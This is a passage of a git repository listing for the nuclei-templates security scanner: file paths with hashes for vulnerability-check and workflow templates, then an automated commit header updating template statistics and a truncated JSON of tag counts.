+nuclei-templates/vulnerabilities/wordpress/wp-email-subscribers-listing.yaml:c40cc1812be750b2461a4ad482d45fb36d41f885 +nuclei-templates/vulnerabilities/wordpress/wp-enabled-registration.yaml:850ce1465fa65fe32622b2aa10f82658b5231cc4 +nuclei-templates/vulnerabilities/wordpress/wp-finder-xss.yaml:f4a7f689bbc02586ae1f1956190da27f86e85cc7 +nuclei-templates/vulnerabilities/wordpress/wp-flagem-xss.yaml:d00f072bdf93fd9d6c05764346cf17f50830fe9d +nuclei-templates/vulnerabilities/wordpress/wp-full-path-disclosure.yaml:0bbf31267d4fc73626d20a6c69f7fe363c683979 +nuclei-templates/vulnerabilities/wordpress/wp-grimag-open-redirect.yaml:fae434011a0238a681f200dbe4c4d4f40d199f08 +nuclei-templates/vulnerabilities/wordpress/wp-gtranslate-open-redirect.yaml:292dbaed0422932d496274fa5ef18b31a0c2b2fe +nuclei-templates/vulnerabilities/wordpress/wp-haberadam-idor.yaml:cb5c7c8be8f9e20ee513f3f9e62eca395c363f2d +nuclei-templates/vulnerabilities/wordpress/wp-idx-broker-platinum-listing.yaml:e0bfc6ba2375065a5f9c7f0a83d2bc89d1785df7 +nuclei-templates/vulnerabilities/wordpress/wp-insert-php-xss.yaml:2c2c70bfbe6e3d5d73b4a6fe0f22bf23556fcc37 +nuclei-templates/vulnerabilities/wordpress/wp-iwp-client-listing.yaml:4d313c1400fc177019afc54ad22d9c9ce573d6c0 +nuclei-templates/vulnerabilities/wordpress/wp-javospot-lfi.yaml:0b166f7a2b039a81e57199397e78ec4e48a4e40b +nuclei-templates/vulnerabilities/wordpress/wp-knews-xss.yaml:bc3c87da95c4bde64d08851d4fcdaa4112cc2c42 +nuclei-templates/vulnerabilities/wordpress/wp-license-file.yaml:c89277a336515df58b497af52b40c0c3362b8b32 +nuclei-templates/vulnerabilities/wordpress/wp-mailchimp-log-exposure.yaml:e01364448edf2c0a724578a8a57cf0852fd8ef28 +nuclei-templates/vulnerabilities/wordpress/wp-memphis-documents-library-lfi.yaml:d9642b2824428d1891f44f17339831be88c2db56 +nuclei-templates/vulnerabilities/wordpress/wp-mstore-plugin-listing.yaml:dad7a20fbed69a285f10fba9a6c3584894d0e687 +nuclei-templates/vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml:20caebbc0abc936fbbc6b918f5051ca56cb64193 +nuclei-templates/vulnerabilities/wordpress/wp-nextgen-xss.yaml:7f530e4ba04d2f252602c95f711323af88d9acc4 +nuclei-templates/vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml:a96d5beebf1d880c5ed35a65a21276a630ad633b +nuclei-templates/vulnerabilities/wordpress/wp-phpfreechat-xss.yaml:f06da3c9c9b33481d7b9951d8b3a911549e9678e +nuclei-templates/vulnerabilities/wordpress/wp-plugin-1-flashgallery-listing.yaml:4bfad99a5f0046248b4d591f0575328ebc19c811 +nuclei-templates/vulnerabilities/wordpress/wp-plugin-lifterlms.yaml:3b0317585051b2e0e5339bd8a710afa59afb00f3 +nuclei-templates/vulnerabilities/wordpress/wp-plugin-utlimate-member.yaml:785a439860f25a93723dcafe70df07a9ca5d8878 +nuclei-templates/vulnerabilities/wordpress/wp-popup-listing.yaml:785ac140e5ea854efe88bf024eccb412e1e4a2b7 +nuclei-templates/vulnerabilities/wordpress/wp-prostore-open-redirect.yaml:26aae9e310c8b2552936bd8cdca7f1e5dc95fc3a +nuclei-templates/vulnerabilities/wordpress/wp-qards-listing.yaml:3e818352aec73dea20601e04c7ed3777d15619c9 +nuclei-templates/vulnerabilities/wordpress/wp-related-post-xss.yaml:b84d07f3648fc0b8168635a1c111ca194d09cdaa +nuclei-templates/vulnerabilities/wordpress/wp-securimage-xss.yaml:b3c4fce836f1220c29ec1a791b791d7c01b08842 +nuclei-templates/vulnerabilities/wordpress/wp-security-open-redirect.yaml:54f34d0f81cc50f1935187402a7f274f1fc8c66d +nuclei-templates/vulnerabilities/wordpress/wp-sfwd-lms-listing.yaml:5258598f1ab3ab28cbd5bfd5f68e6af49ccde0e2 +nuclei-templates/vulnerabilities/wordpress/wp-simple-fields-lfi.yaml:5105c8889e18472944f8fc3c564aa0dbabbbb7aa +nuclei-templates/vulnerabilities/wordpress/wp-slideshow-xss.yaml:ba0a1474e9ad9fcc9157eb318345b5a59a452b5b +nuclei-templates/vulnerabilities/wordpress/wp-socialfit-xss.yaml:2c781a49b8a301ff767c1bb231379c590a41f1eb +nuclei-templates/vulnerabilities/wordpress/wp-spot-premium-lfi.yaml:a4a409a45bc4923031cf85e4a20d40a5b42717e2 +nuclei-templates/vulnerabilities/wordpress/wp-super-forms.yaml:ce9eb9eac78936c43cc1dfd0a35ae4671f943519 +nuclei-templates/vulnerabilities/wordpress/wp-sym404.yaml:d48051d4c7e5ebdd26f506c531ed87045c7afe30 +nuclei-templates/vulnerabilities/wordpress/wp-tinymce-lfi.yaml:0ab3957aebb942c846cd19b1e1da2fe8389738f3 +nuclei-templates/vulnerabilities/wordpress/wp-tutor-lfi.yaml:292dbe6661c54e43d3481c3178c3a96bd4cb6338 +nuclei-templates/vulnerabilities/wordpress/wp-under-construction-ssrf.yaml:c970ec52bb14a792d37c19726e17d99d555b4434 +nuclei-templates/vulnerabilities/wordpress/wp-upload-data.yaml:62566780d8c2e015ebee4488dce5beaea26135eb +nuclei-templates/vulnerabilities/wordpress/wp-vault-lfi.yaml:854912ca89135f9ab4fc1d30765c56be1526134b +nuclei-templates/vulnerabilities/wordpress/wp-woocommerce-email-verification.yaml:021ed1360130e60b18eda1793a2c564f453d7873 +nuclei-templates/vulnerabilities/wordpress/wp-woocommerce-file-download.yaml:253df0ce904ff53021a48abc1beeb9767cef3096 +nuclei-templates/vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml:6e84667acf3bcbb608d0b66061deed15d9d6628a +nuclei-templates/vulnerabilities/wordpress/wp-xmlrpc-brute-force.yaml:eb2db9aaa9fe2950c2ace9a4876532c01f1c1d2d +nuclei-templates/vulnerabilities/wordpress/wp-xmlrpc-pingback-detection.yaml:3df785987fe4c2f391d16dfccdcc09df00993a33 +nuclei-templates/vulnerabilities/wordpress/wp-xmlrpc.yaml:0968a0581eed95b28eeaa1055c25f1c6545d1c5c +nuclei-templates/vulnerabilities/wordpress/wpdm-cache-session.yaml:f4d9bea1bb98e6a70d1b1dea4d8f9aab6bd8f8da +nuclei-templates/vulnerabilities/wordpress/wpify-woo-czech-xss.yaml:a4fe3bf4cd826bf35cf40d5377fcb9fc98452f9d +nuclei-templates/vulnerabilities/wordpress/wpmudev-pub-keys.yaml:ea31f3f2365226fdf4d8633141ece753c86e4bd6 +nuclei-templates/vulnerabilities/wordpress/wptouch-open-redirect.yaml:529bb9502d2081718e82aead62817dc69c8faf9f +nuclei-templates/vulnerabilities/wordpress/wptouch-xss.yaml:802789d17e6ff0383639c99e1d522086b8091258 +nuclei-templates/vulnerabilities/yonyou/erp-nc-directory-traversal.yaml:4a4aee1b98be7accd3b2ede7012ca1aba62f94d7 +nuclei-templates/vulnerabilities/yonyou/wooyun-path-traversal.yaml:4cbc19c4e5b0d2103c521ad74c4ce7dc6a9a0430 +nuclei-templates/vulnerabilities/yonyou/yonyou-u8-oa-sqli.yaml:836419d5e5f74b3443a770dee5c6c9a81d3acc92 +nuclei-templates/wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 +nuclei-templates/workflows/74cms-workflow.yaml:361e31c8bbf6b1df6fcb10d7c4929bd2185678af +nuclei-templates/workflows/acrolinx-workflow.yaml:cf70e0bacfae074e25c2eb34ff80fc05672a91b3 +nuclei-templates/workflows/activemq-workflow.yaml:7a951a690804176eac5fbb0e414ee62c36f05abf +nuclei-templates/workflows/adminer-workflow.yaml:37f79f76bbeea61b36139e30487788a54e221e15 +nuclei-templates/workflows/aem-workflow.yaml:9e21e6e590c5e84e10fbc47990bad1db673f6fec +nuclei-templates/workflows/airflow-workflow.yaml:d8247d822e5c101c92f1afb77a1e231459b05549 +nuclei-templates/workflows/ambari-workflow.yaml:4f7361b5d53a50e9b4b6387ec0521855755e5868 +nuclei-templates/workflows/apache-workflow.yaml:71ff50d67b4fc7308bce8269b6d430fa0485d4ec +nuclei-templates/workflows/apereo-cas-workflow.yaml:7edeb7f1fd15adf35e7ed9c0c153ba7e7f1b74a1 +nuclei-templates/workflows/apisix-workflow.yaml:0715357bc298e388e598515e40c6d65f3cdc7d2d +nuclei-templates/workflows/artica-web-proxy-workflow.yaml:fed0fe239f16a1da6661dbdc84f73ddf302cdf51 +nuclei-templates/workflows/artifactory-workflow.yaml:64ec71daf0b84002539a688162d98c53899ebdec +nuclei-templates/workflows/avantfax-workflow.yaml:c308c1bbb2eaa2074cfce142f06c156b2b3b065b +nuclei-templates/workflows/aviatrix-workflow.yaml:c87e369733ebc2c71e64ce875e46ca09bc370223 +nuclei-templates/workflows/axigen-workflow.yaml:3e470c044dc133f5273aa18b7b1f7f2caa70272c +nuclei-templates/workflows/azkaban-workflow.yaml:f72f083e01848ee57f18e3427a237499c999c326 +nuclei-templates/workflows/azure-workflow.yaml:a262ac650f2b721182c72b9475cd06e186131d1b +nuclei-templates/workflows/b2evolution-workflow.yaml:5028ad4cf304d1340f3bab6f71467f7d347576b4 +nuclei-templates/workflows/bigip-workflow.yaml:3f74c06744373fee1b0955f4201ea3959a92e01b +nuclei-templates/workflows/bitrix-workflow.yaml:5a9e6549c849f2b962b45c08fe7038aed2ec28bf +nuclei-templates/workflows/bomgar-workflow.yaml:395e200a90a8658697b0608fd49d09c475001e56 +nuclei-templates/workflows/bullwark-workflow.yaml:5913dd150c3baa4f1fb3cd8ac59497a156b63298 +nuclei-templates/workflows/cacti-workflow.yaml:57f061192a2064a79d19dad580081b1f9405961a +nuclei-templates/workflows/centos-workflow.yaml:5871788f357f8f167148b27076ac41ab413c4565 +nuclei-templates/workflows/chamilo-workflow.yaml:437490e0b06c8c543bfe5eec14c84a6e3498ed65 +nuclei-templates/workflows/checkpoint-workflow.yaml:f45e84626a421dd99a7a8eda60ba6c0eda82d8cb +nuclei-templates/workflows/cherokee-workflow.yaml:cb004f5ba1626e241f278706ce2e7f4381c48b26 +nuclei-templates/workflows/circarlife-workflow.yaml:939d17ad26f49c625a5fc0fa53df86957432ca3e +nuclei-templates/workflows/cisco-asa-workflow.yaml:28931c4448768b0c61587139033e18752149eaf8 +nuclei-templates/workflows/cisco-meraki-workflow.yaml:73e280902d36c72f487e207096327b23057f2dc0 +nuclei-templates/workflows/cockpit-workflow.yaml:b49b6b6d6c5b6375db9d0b19a69136825fab6368 +nuclei-templates/workflows/cocoon-workflow.yaml:99d57081b9236d98514b6bb41ad66fa176f26d7e +nuclei-templates/workflows/coldfusion-workflow.yaml:d15dfe8f9ca99a1a42fc137a3afeae4d4503d2d9 +nuclei-templates/workflows/concrete-workflow.yaml:1a8e0409bde343bb5c86df86e82fc9b93a5f5be4 +nuclei-templates/workflows/confluence-workflow.yaml:93f468076677c54293a788ae5651dc7b7e250ca3 +nuclei-templates/workflows/dahua-workflow.yaml:c3edcf9b8bd86e6302375740c2da3041afe144b0 +nuclei-templates/workflows/dedecms-workflow.yaml:3d1e75495b821b7b18b3502ffd26d64727d1f6cc +nuclei-templates/workflows/default-application-workflow.yaml:1592fc4ec1e83c3e23fe0399e014b44c4353ba1d +nuclei-templates/workflows/dell-idrac-workflow.yaml:a4867b65543b6b32b640a496d28d90394e868e6e +nuclei-templates/workflows/dolibarr-workflow.yaml:e8e90499ad90d72af254fdc1efc9cb1ed122ecbd +nuclei-templates/workflows/dotnetnuke-workflow.yaml:fe4b948daf3ce60322ac20e5d06a449f32b8e5d5 +nuclei-templates/workflows/drupal-workflow.yaml:cfafc6cce0d782528a237834708e711eb16b619a +nuclei-templates/workflows/duomicms-workflow.yaml:c76a80ac7e19ff34f9422b52fcf0870841eda36b +nuclei-templates/workflows/dynamicweb-workflow.yaml:63d372aa0f8ab07bf0d51b4f02fdee077c3e4193 +nuclei-templates/workflows/emby-workflow.yaml:2a1aa30f9952acfe6d3f5b35e19b009b742b16fc +nuclei-templates/workflows/emerge-workflow.yaml:067419c65f2029a1feacd54e3387b1a5d79a445b +nuclei-templates/workflows/episerver-workflow.yaml:441e7f55af2a1ab73673bb7f05970e7c73c9d0ce +nuclei-templates/workflows/feifeicms-workflow.yaml:efc1a02f4fb059f507aa71586e9571d7ea65c12c +nuclei-templates/workflows/finereport-workflow.yaml:e99e1b1cadf73eb3348669c83c609886d4e1c50b +nuclei-templates/workflows/fortinet-workflow.yaml:998f802086ff074b1fe39679720fb0a6b174699d +nuclei-templates/workflows/gateone-workflow.yaml:14f3d98a199b046c4fc4f748269af41bfff0d03f +nuclei-templates/workflows/geowebserver-workflow.yaml:073255617f1cccf5c50f6ecbb9c10a5841c2582d +nuclei-templates/workflows/gespage-workflow.yaml:4040ddf9d6011153bdc0fdf2dabf27a4fd60e90d +nuclei-templates/workflows/gitlab-workflow.yaml:95870fa28bc5970ca4d345c99585db34261208d4 +nuclei-templates/workflows/gitlist-workflow.yaml:b31bee67c369438d1cf53115c78a263c9e19d7fd +nuclei-templates/workflows/glpi-workflow.yaml:a01a11b199ad3559cfe188aff54e8ba18bd738a6 +nuclei-templates/workflows/gocd-workflow.yaml:c8744f907075a1087facf5fda707af8957304840 +nuclei-templates/workflows/gogs-workflow.yaml:40ed949d67707e7886a2d6a4aa3e495c6abfaff0 +nuclei-templates/workflows/google-api-enumeration-workflow.yaml:704ee67a2712f46a03e21b2f0747318aadcb244e +nuclei-templates/workflows/gophish-workflow.yaml:3536230c93abd85614d347d44fb61af477cdaa3e +nuclei-templates/workflows/grafana-workflow.yaml:7ca0343ac44a1fe14e3be93a94c9fde1e45a2bad +nuclei-templates/workflows/graphite-workflow.yaml:5bc6d9b71597e759a8df3b8d7954cc42395f4c4b +nuclei-templates/workflows/grav-workflow.yaml:ff40ca7be110fdeae663c895d27d2a55b2e0327b +nuclei-templates/workflows/gsoap-workflow.yaml:eda1ff7636b8c132091700413939d73c68e1b25d +nuclei-templates/workflows/guacamole-workflow.yaml:526c8958d20330b312d15767cbcff712d8a350a7 +nuclei-templates/workflows/h3c-imc-workflow.yaml:be7cea08800418f986aae8d866cac393f0454de1 +nuclei-templates/workflows/harbor-workflow.yaml:73b7bd25731b5a80c4b32fbfba114ff50870820b +nuclei-templates/workflows/hikvision-workflow.yaml:9eb073664466db9f35e1c3b6d7cff648756227fb +nuclei-templates/workflows/igs-workflow.yaml:dd83b0fc67f9c4cd38021625c5f04f62afff453e +nuclei-templates/workflows/itop-workflow.yaml:3ae72bbee62d15500197cec9b93357664d85659e +nuclei-templates/workflows/jboss-workflow.yaml:8b9e5ebfb41b9362cfeb685f93cc4d6f416f70b2 +nuclei-templates/workflows/jeedom-workflow.yaml:c2e373c7686f3a48a7721f329ebcbdf763a96607 +nuclei-templates/workflows/jellyfin-workflow.yaml:2091900ae719653095ed40f893a92e3762c0d391 +nuclei-templates/workflows/jenkins-workflow.yaml:9d69c8296df914628a3c45ef7c056145ed0c93d2 +nuclei-templates/workflows/jetty-workflow.yaml:2fcabd7081869fac4daf9cceba4889bbeba71dc6 +nuclei-templates/workflows/jira-workflow.yaml:9356850dc15757afde2df5a024003bbd04373209 +nuclei-templates/workflows/joomla-workflow.yaml:78793f762823952fa888df44a2fbefe3b788d869 +nuclei-templates/workflows/kentico-workflow.yaml:2d15de92c0bfd5ea0e3ac029891de88817a3693d +nuclei-templates/workflows/keycloak-workflow.yaml:7260cffff47185649a8a4f7dc16fb64b6e141e75 +nuclei-templates/workflows/kibana-workflow.yaml:0ba6c853d1dc1d8081328cb5db0b6663860b62bd +nuclei-templates/workflows/kindeditor-workflow.yaml:0ac2715d644d554334047424fb5763b26162817b +nuclei-templates/workflows/kong-workflow.yaml:25b72e7446008287f8437a988944cfd314060114 +nuclei-templates/workflows/lanproxy-workflow.yaml:cf49a00a1f27906c74f37e139602b3f735ea21dd +nuclei-templates/workflows/lansweeper-workflow.yaml:ae9182f562f8a5b6ef1eee681599a542a56a8b81 +nuclei-templates/workflows/laravel-workflow.yaml:9d2a5bd003094b12137a4827ebb3ca2a6bdbd8f2 +nuclei-templates/workflows/liferay-workflow.yaml:717a3f035480e680b4113b5d68fd2918b7ae8b3c +nuclei-templates/workflows/lotus-domino-workflow.yaml:70052ea76c8c08042a7d43e6230a807ecd0081b2 +nuclei-templates/workflows/lucee-workflow.yaml:6743598323b1111359812a43f7cc878288dc9c6a +nuclei-templates/workflows/magento-workflow.yaml:4b0b17ebf2328a3913ba78354c7adb581f11df1e +nuclei-templates/workflows/magmi-workflow.yaml:70ec45f5d2d5f4b19542ccad94c3d8b106accfa7 +nuclei-templates/workflows/maian-workflow.yaml:8764ecf2fae4610ff21cd28dee2cb8a8ce2991ce +nuclei-templates/workflows/mantisbt-workflow.yaml:256b4a99fb8e800cd676fb4f6227fdd3fd32c660 +nuclei-templates/workflows/mautic-workflow.yaml:1d1921e57b2e2124814ddacc4dbb506418406efc +nuclei-templates/workflows/metabase-workflow.yaml:4cf6e6508549f46639071dab1b05b13fc76adbf2 +nuclei-templates/workflows/metinfo-workflow.yaml:78c3865880ac656bb2d45bf9a09e4da7e0652c4c +nuclei-templates/workflows/micro-focus-workflow.yaml:35c4b319c699ee236f879cdeda8cb3bf37b905ae +nuclei-templates/workflows/microsoft-exchange-workflow.yaml:e5e8f5d449f10de535caccf26101c7c4853b4775 +nuclei-templates/workflows/microstrategy-workflow.yaml:2880556194560a6836644c2196aae44134b7e6ae +nuclei-templates/workflows/mida-eframework-workflow.yaml:fd299d8fe3244232efa3a9dfb8db7b4ef60d440b +nuclei-templates/workflows/mobileiron-workflow.yaml:d23ece056a8a867297f5209def8ace9a0b0a72c9 +nuclei-templates/workflows/moodle-workflow.yaml:8422a8cfc07828aa4a816f0028a743f6a146ac53 +nuclei-templates/workflows/movable-workflow.yaml:d0cc518d2260163664ba91d6c587eb204045f205 +nuclei-templates/workflows/netgear-workflow.yaml:bc2c3dd0ecab3c713eccd45e4e3c7bc2409d0776 +nuclei-templates/workflows/netsweeper-workflow.yaml:fae6a3ccb6985649aa693626e7a534e8e55911da +nuclei-templates/workflows/nette-workflow.yaml:9e1d36ca5df76c744ae30b700d678f64c40042f2 +nuclei-templates/workflows/node-red-workflow.yaml:c4f211dea07caaecb4558807567d77066d5c136b +nuclei-templates/workflows/novnc-workflow.yaml:80d55370cc9aac3722bc1eccd33a08db6d4683e6 +nuclei-templates/workflows/ofbiz-workflow.yaml:8cc22840dc021c4c2de35a4ef139d9cf3764ff1a +nuclei-templates/workflows/openam-workflow.yaml:5bd678002eb886438f82fed491f2629ecb1877e4 +nuclei-templates/workflows/openemr-workflow.yaml:d6076699c7a90609b73ccff8964652fd390fb1c0 +nuclei-templates/workflows/opensis-workflow.yaml:46d3782e008e73c418da9d4ea611541cc1078ff5 +nuclei-templates/workflows/opensns-workflow.yaml:133e1a5d4a298c15e44244b07708de5916a37873 +nuclei-templates/workflows/oracle-peoplesoft-workflow.yaml:4605c1be7fe030a0d65448ecc4183424c2174c70 +nuclei-templates/workflows/oscommerce-workflow.yaml:4872811ed52d2e04a5b44b131902725e40af0d1b +nuclei-templates/workflows/pandora-workflow.yaml:3fddacd42cc9721a0d4d8cf5ae5d25457b4bece7 +nuclei-templates/workflows/pega-workflow.yaml:b2e421522f325cf7542a7e31ecc684789e6ef000 +nuclei-templates/workflows/pentaho-workflow.yaml:f6a0d2a3b0632ac02ce84831be2872d0ed3baf61 +nuclei-templates/workflows/phpcollab-workflow.yaml:16d51ec188cd34748254464403a548cf60051d3a +nuclei-templates/workflows/phpmyadmin-workflow.yaml:755e0d413890e58cd69c57dfc960cf5e1b03039e +nuclei-templates/workflows/phppgadmin-workflow.yaml:6eac70c55b9b7a680a8042cc76a6d8c201928ac3 +nuclei-templates/workflows/phpwiki-workflow.yaml:8a472c403cc0e3ac889fa642977221a288594caf +nuclei-templates/workflows/powercreator-workflow.yaml:3c289cf12313d76a6f543f4c5f19f203d38a54fa +nuclei-templates/workflows/processmaker-workflow.yaml:537d559b9b9a59c768a5e7e11837e070aebef841 +nuclei-templates/workflows/prometheus-workflow.yaml:922bd3b96edb4059ac30d554c0bf440e184d15c0 +nuclei-templates/workflows/prtg-workflow.yaml:3e1aba3f791749a933b20bd6db66320e4da3920c +nuclei-templates/workflows/pulsesecure-workflow.yaml:35ba4d8fb56538725eaef94ad9467ae6df844eca +nuclei-templates/workflows/qcubed-workflow.yaml:e0e0a3a1794d942d86f58ca16946188218e40ea4 +nuclei-templates/workflows/r-seenet-workflow.yaml:ba2ee6b90f0d368359bca254e8233f37bfd5312a +nuclei-templates/workflows/rabbitmq-workflow.yaml:149c46b46f46656ae774584d6c2f7c0e32b6671a +nuclei-templates/workflows/rancher-workflow.yaml:e6733c148d9fde2a5da7768e1bd86004d1d2ec87 +nuclei-templates/workflows/rconfig-workflow.yaml:329388b703ee1a5ab7cf258515eef09a53f52edd +nuclei-templates/workflows/ricoh-workflow.yaml:53237180cd3c69ca304d5797d0a92f67e8d9058b +nuclei-templates/workflows/rosariosis-workflow.yaml:4dbbf927ac8aa8f07e1b7c4e51cd861ed0461df0 +nuclei-templates/workflows/rstudio-workflow.yaml:e0a330de77902dc038192d435c9fdcaa3903a501 +nuclei-templates/workflows/ruijie-workflow.yaml:cc328047d5c8488d1af9da287f10c112eac7d44e +nuclei-templates/workflows/saltstack-workflow.yaml:7b10b05a872a2c8a5a0b2ea2ad39de04343ebdaa +nuclei-templates/workflows/samsung-wlan-ap-workflow.yaml:65db347ccd86f624eabc1a06c3ce91bd88daecd2 +nuclei-templates/workflows/sap-netweaver-workflow.yaml:38a36f8bf7f6e4ca21cee4306c2395e625efbeb2 +nuclei-templates/workflows/sarg-workflow.yaml:f9f0a58739321cc0605470c6faabc6d377200bd6 +nuclei-templates/workflows/sco-workflow.yaml:35ca48ebc8a3f95a6ac5db6d8bbffdc8a94b19b0 +nuclei-templates/workflows/sequoiadb-workflow.yaml:c13e16182cf4970ef15e76b07d8f1b314d86e69d +nuclei-templates/workflows/sharepoint-workflow.yaml:bc9ed2b9983f515c3204bbfb63db6952d4ac3e27 +nuclei-templates/workflows/shopxo-workflow.yaml:c52cea2020eef05fdf088febd83f64ac2508d7da +nuclei-templates/workflows/sidekiq-workflow.yaml:6e34f1414eada2b605a0160af9c1e0e89a5f6f2b +nuclei-templates/workflows/sitecore-workflow.yaml:851649c062a157af6f7ce07ee90d1744b3f758e2 +nuclei-templates/workflows/skywalking-workflow.yaml:5da71a002bfe30e00eee015b6fafe00086915851 +nuclei-templates/workflows/solarwinds-orion-workflow.yaml:dbdec98a0a1c88a453b6b87f3e8913a530c33355 +nuclei-templates/workflows/solr-workflow.yaml:75c9e056575fc8b4b922c7240493f1901b10ede6 +nuclei-templates/workflows/sonarqube-workflow.yaml:b1f7525817d3d53c2891f224a79e35bc4bbe30fa +nuclei-templates/workflows/sourcebans-workflow.yaml:decfab539d334156a3bf2df245863ec29390bd85 +nuclei-templates/workflows/splunk-workflow.yaml:835a299c31937b9006ce938c46d97fedcb0bcd67 +nuclei-templates/workflows/springboot-workflow.yaml:3bc6cf2a449b03d276c3498ec24cebb40f57b8ea +nuclei-templates/workflows/squirrelmail-workflow.yaml:dff5407b3128d1616b2358e8e184a77af8980d0e +nuclei-templates/workflows/subrion-workflow.yaml:0865d9ee1dfc7d5924d3c416d650a662ce9e8c32 +nuclei-templates/workflows/sugarcrm-workflow.yaml:e0dda278ab6a21236f66c1cf2ab74c01df3c2b08 +nuclei-templates/workflows/symfony-workflow.yaml:5c38cb3f16c28e8a58e1b18a2022ab85b1832254 +nuclei-templates/workflows/sysaid-workflow.yaml:697163819fa2bab567e31837772a6c46bbda5a57 +nuclei-templates/workflows/tapestry-workflow.yaml:10357a46b7ca858abe7497dfe180021100865838 +nuclei-templates/workflows/terramaster-workflow.yaml:00c7173e6e9676382c6697bc9978bb5be9946e10 +nuclei-templates/workflows/thinfinity-workflow.yaml:e77c45ad2bb5fe89a819cfe26824c188c05cf0c9 +nuclei-templates/workflows/thinkadmin-workflow.yaml:1d9fb26797e8033e48afb6f25baf878eb7abee1c +nuclei-templates/workflows/thinkcmf-workflow.yaml:8d50f187be8de285b622aab1ba402bc61a880197 +nuclei-templates/workflows/thinkphp-workflow.yaml:eaaccb8c59778e699704de1ae1cdf4673eb743cb +nuclei-templates/workflows/thruk-workflow.yaml:f5035ab25488e5cd1787a9cf9a1060f888e720d3 +nuclei-templates/workflows/tikiwiki-workflow.yaml:96b5fd29ff05d8f56befb92e3959d27b6d0c310f +nuclei-templates/workflows/tomcat-workflow.yaml:87e732f14c2e7ae7ea4c71bfdcffce3801c461a7 +nuclei-templates/workflows/tongda-workflow.yaml:a0d787a1360ac98472818318fd73b9a3b5187a00 +nuclei-templates/workflows/tpshop-workflow.yaml:c316b8e968a8e639cd74c04dcf21e43c0f09360b +nuclei-templates/workflows/traefik-workflow.yaml:a83aa9e512356c004de49b46d4737f77b14aa07b +nuclei-templates/workflows/umbraco-workflow.yaml:c340f1afa89decde58c0367b78ce9a216f49c99a +nuclei-templates/workflows/vbulletin-workflow.yaml:b44d63825bca5770252aaaf15e4f78faf434a8e8 +nuclei-templates/workflows/vmware-workflow.yaml:70f15613f62ff3e8927b5c66d2c59dc5afb1b302 +nuclei-templates/workflows/voipmonitor-workflow.yaml:e237440e690c00cacf48e6ad5072c101c58b7aaf +nuclei-templates/workflows/weblogic-workflow.yaml:8694ca39d92e94142cd3f333fad689d8d11c30c0 +nuclei-templates/workflows/webmin-workflow.yaml:b63a68fbaaeb5a23ccbc34da3c8401b68620f0c0 +nuclei-templates/workflows/websvn-workflow.yaml:93a94a507c0f1b367956665ba56e355fff92363a +nuclei-templates/workflows/wordpress-workflow.yaml:5ded9d601e03e9945d6c9326c0144cf69a9b81da +nuclei-templates/workflows/worksite-takeover-workflow.yaml:6928845ee99fe726c0b047481c924bde32dd3054 +nuclei-templates/workflows/wuzhicms-workflow.yaml:122706807593ebce13de943a75aab61e4df9c32d +nuclei-templates/workflows/xdcms-workflow.yaml:0c6c0168655b4ccedce9cf109218051d7e352356 +nuclei-templates/workflows/xiuno-workflow.yaml:4b70daaad35d586f53350a2392844e178896ad99 +nuclei-templates/workflows/xxljob-workflow.yaml:17ac43d3a6f989946a68b48906aaeb4f5d4e81e5 +nuclei-templates/workflows/yapi-workflow.yaml:ccbc05dd848b839c31a5264f9da9570d9f18479e +nuclei-templates/workflows/yii-workflow.yaml:4f6a6362938460e5f723f54aaa82be03cad8a9ac +nuclei-templates/workflows/yonyou-nc-workflow.yaml:57927d9591bff2e5fa6696039da95838f453e91f +nuclei-templates/workflows/zabbix-workflow.yaml:558965f0587b7d91bd2ef40a28f9d022dadff760 +nuclei-templates/workflows/zcms-workflow.yaml:374a156202ff7cd4453dd135c17b71a18f29ad0c +nuclei-templates/workflows/zeroshell-workflow.yaml:9e181d4db5ed5ca45a73b8394f808c7785f797f0 +nuclei-templates/workflows/zimbra-workflow.yaml:0ea7b4ec8697b604886660dabf14a893a70b6235 +nuclei-templates/workflows/zzzcms-workflow.yaml:560caa3f54877d16d5a373459ba53d5dd4586fe3 From b9216c24e4bc198970332651b5c0df203ae49c22 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 7 Dec 2022 09:33:31 +0000 Subject: [PATCH 1097/1415] Auto Generated Templates Stats [Wed Dec 7 09:33:31 UTC 2022] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 4426 +++++++++++++++++++++--------------------- TOP-10.md | 18 +- 3 files changed, 2233 insertions(+), 2213 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index c1422e784c..bdf8e733a6 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":1551},{"name":"panel","count":778},{"name":"edb","count":582},{"name":"exposure","count":551},{"name":"xss","count":541},{"name":"lfi","count":519},{"name":"wordpress","count":470},{"name":"cve2021","count":369},{"name":"wp-plugin","count":365},{"name":"tech","count":357},{"name":"rce","count":347},{"name":"packetstorm","count":292},{"name":"cve2022","count":269},{"name":"wpscan","count":256},{"name":"token-spray","count":236},{"name":"misconfig","count":228},{"name":"cve2020","count":222},{"name":"","count":195},{"name":"unauth","count":194},{"name":"wp","count":187},{"name":"kev","count":168},{"name":"config","count":167},{"name":"cve2018","count":145},{"name":"cve2019","count":137},{"name":"joomla","count":135},{"name":"default-login","count":133},{"name":"apache","count":127},{"name":"oast","count":127},{"name":"iot","count":125},{"name":"authenticated","count":120},{"name":"sqli","count":118},{"name":"cve2010","count":111},{"name":"router","count":92},{"name":"files","count":92},{"name":"redirect","count":90},{"name":"login","count":89},{"name":"network","count":81},{"name":"devops","count":75},{"name":"takeover","count":75},{"name":"token","count":74},{"name":"ssrf","count":72},{"name":"cve2017","count":70},{"name":"cms","count":67},{"name":"auth-bypass","count":66},{"name":"file","count":65},{"name":"oracle","count":63},{"name":"intrusive","count":60},{"name":"install","count":59},{"name":"disclosure","count":57},{"name":"seclists","count":57},{"name":"oss","count":52},{"name":"cisco","count":50},{"name":"cve2016","count":49},{"name":"google","count":48},{"name":"fileupload","count":47},{"name":"cve2015","count":47},{"name":"adobe","count":45},{"name":"aem","count":42},{"name":"cve2014","count":41},{"name":"plugin","count":41},{"name":"atlassian","count":38},{"name":"vmware","count":38},{"name":"vulhub","count":38},{"name":"logs","count":38},{"name":"debug","count":37},{"name":"hackerone","count":37},{"name":"tenable","count":36},{"name":"traversal","count":35},{"name":"springboot","count":35},{"name":"injection","count":34},{"name":"jira","count":32},{"name":"listing","count":31},{"n